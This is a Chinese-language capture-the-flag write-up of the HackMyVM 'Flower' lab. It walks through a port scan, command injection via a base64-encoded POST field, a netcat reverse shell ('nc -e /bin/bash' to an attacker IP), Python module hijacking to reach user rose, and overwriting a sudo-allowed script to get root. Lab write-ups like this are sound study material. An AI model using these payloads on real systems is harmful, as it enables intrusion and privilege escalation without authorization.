guayu-kakeru
0%

HMV-Flower

发表于 更新于 分类于

HMV-Flower靶场复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.240.115         
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-02 19:12 CST
Nmap scan report for 192.168.240.115
Host is up (0.0018s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 1A:69:75:79:70:92 (Unknown)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.79 ms 192.168.240.115

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.02 seconds

只开放了80web端口

web探测


web端只有一个提交按钮,但是也不能上传文件
跑一下目录,也没有发现什么有作用的
看一下页面的源代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
<!DOCTYPE html>
<html>
    <head>
    <style>
    html {
      background: url(flower.jpg) no-repeat center center fixed; 
      background-size: cover;
     }
    </style>
    </head>
    <body>
        <h1 style="background-color:pink;">Count Petals</h1>
         <label for="flowers" style="background-color:pink;">Choose a flower to count petals:</label>
         <select name="petals" form="flosub">
            <option name="Lily" value="MSsy">Lily</option>
            <option name="Buttercup" value="Misz">Buttercup</option>
            <option name="Delphiniums" value="Mys1">Delphiniums</option>
            <option name="Cineraria" value="NSs4">Cineraria</option>
            <option name="Chicory" value="OCsxMw==">Chicory</option>
            <option name="Chrysanthemum" value="MTMrMjE=">Chrysanthemum</option>
            <option name="Michaelmas daisies" value="MjErMzQ=">Michaelmas daisies</option>
	 </select> 
        <form action="/" method="post" id="flosub">
         <input type="submit" value="Submit">
        </form>
        <h2>

        
        </h2>
    </body>
</html>

value 中的值是base64加密之后的计算式 petals这个参数用post请求发送,猜测存在命令执行漏洞

1
2
3
┌──(root㉿kakeru)-[~/tmp]
└─# echo "MSsy" | base64 --decode              
1+2

所以用bp修改包内容,用petals发送base64加密之后的指令

1
2
3
┌──(root㉿kakeru)-[~/tmp]
└─# echo "system('pwd')" | base64  
c3lzdGVtKCdwd2QnKQo=


用这种方法反弹shell 拿到www-data的shell
system('nc -e /bin/bash 192.168.240.83 1234')

1
2
3
4
┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234            
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

提权

1
2
3
4
5
6
7
8
www-data@flower:/home$ sudo -l
sudo -l
Matching Defaults entries for www-data on flower:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on flower:
    (rose) NOPASSWD: /usr/bin/python3 /home/rose/diary/diary.py

www用户可以执行rose用户的一个脚本
看看这个py脚本

1
2
3
4
5
6
7
www-data@flower:/home$ cat /home/rose/diary/diary.py
cat /home/rose/diary/diary.py
import pickle

diary = {"November28":"i found a blue viola","December1":"i lost my blue viola"}
p = open('diary.pickle','wb')
pickle.dump(diary,p)

看了wp知道diary.py其实是可以写入文件的 所以写入在pickle中,因为脚本所在的目录是可以控制的

1
2
3
4
5
www-data@flower:/home/rose/diary$ echo "import os;os.system('/bin/bash')" > pickle.py
<echo "import os;os.system('/bin/bash')" > pickle.py
www-data@flower:/home/rose/diary$ sudo -u rose /usr/bin/python3 /home/rose/diary/diary.py
< -u rose /usr/bin/python3 /home/rose/diary/diary.py
rose@flower:~/diary$

因为diary.py中先import了pickle库,我们用python库劫持成功拿到了rose的shell
发现rose也有一个sudo权限命令

1
2
3
4
5
6
7
8
rose@flower:~/diary$ sudo -l
sudo -l
Matching Defaults entries for rose on flower:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rose may run the following commands on flower:
    (root) NOPASSWD: /bin/bash /home/rose/.plantbook

看看内容:

1
2
3
4
5
6
rose@flower:~$ cat .plantbook
cat .plantbook
#!/bin/bash
echo Hello, write the name of the flower that u found
read flower
echo Nice, $flower submitted on : $(date)

写入反弹shell

1
2
rose@flower:~$ echo "/bin/bash" > .plantbook
echo "/bin/bash" > .plantbook

成功拿到rootshell

rose@flower:/$ cat /home/rose/.plantbook
cat /home/rose/.plantbook
/bin/bash
rose@flower:/$ sudo /bin/bash /home/rose/.plantbook
sudo /bin/bash /home/rose/.plantbook
root@flower:/#

总结:这题的要点:1.从web源码发现命令执行漏洞然后反弹shell 2.python库劫持(我的新知识) 3.sh脚本尝试能不能写入,能写入就直接/bin/bash反弹shell